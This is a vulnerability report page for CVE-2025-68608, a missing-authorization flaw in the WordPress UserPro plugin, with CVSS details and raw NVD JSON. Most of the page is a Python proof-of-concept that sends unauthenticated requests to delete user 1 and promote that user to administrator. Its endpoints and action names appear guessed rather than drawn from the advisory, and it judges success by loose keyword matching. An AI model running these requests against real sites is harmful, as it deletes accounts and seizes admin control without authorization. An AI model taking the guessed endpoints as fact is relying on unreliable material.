Security Vulnerability Report
中文
CVE-2025-68608 CVSS 7.5 HIGH

CVE-2025-68608

Published: 2025-12-24 13:16:28
Last Modified: 2026-04-27 19:16:37

Description

Missing Authorization vulnerability in DeluxeThemes Userpro userpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Userpro: from n/a through <= 5.1.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

WordPress UserPro插件 <= 5.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68608 PoC - UserPro Missing Authorization # Affected: WordPress UserPro Plugin <= 5.1.9 import requests import sys TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if UserPro plugin is vulnerable to CVE-2025-68608 Missing Authorization via incorrectly configured access control """ # Common UserPro endpoints that may be affected vulnerable_endpoints = [ f"{TARGET_URL}/wp-content/plugins/userpro/functions/ajax-server.php", f"{TARGET_URL}/wp-content/plugins/userpro/modules/ajax-actions.php", f"{TARGET_URL}/?upajax=1&action=userpro_ajax" ] # Test unauthenticated access to privileged operations test_payloads = [ { "description": "Test admin options access without authentication", "data": { "up_mode": "admin", "template": "admin_options", "action": "userpro_admin_template" } }, { "description": "Test bulk user operations without authentication", "data": { "action": "userpro_bulk_action", "mode": "delete", "users": "1" } }, { "description": "Test role modification without authentication", "data": { "action": "userpro_update_role", "user_id": "1", "new_role": "administrator" } } ] print("[*] CVE-2025-68608 UserPro Missing Authorization PoC") print("[*] Target:", TARGET_URL) print("=" * 60) for endpoint in vulnerable_endpoints: for payload in test_payloads: try: print(f"\n[*] Testing: {payload['description']}") print(f"[*] Endpoint: {endpoint}") response = requests.post(endpoint, data=payload['data'], timeout=10) # Check if response indicates successful unauthorized access if response.status_code == 200: if any(keyword in response.text.lower() for keyword in ['success', 'admin', 'user_list', 'role']): print(f"[!] VULNERABLE: Unauthenticated access possible!") print(f"[!] Response preview: {response.text[:200]}") return True else: print(f"[-] Request sent but no clear vulnerability indicator") else: print(f"[-] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Testing complete. Manual verification recommended.") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68608", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:28.313", "lastModified": "2026-04-27T19:16:36.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in DeluxeThemes Userpro userpro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Userpro: from n/a through <= 5.1.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/userpro/vulnerability/wordpress-userpro-plugin-5-1-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}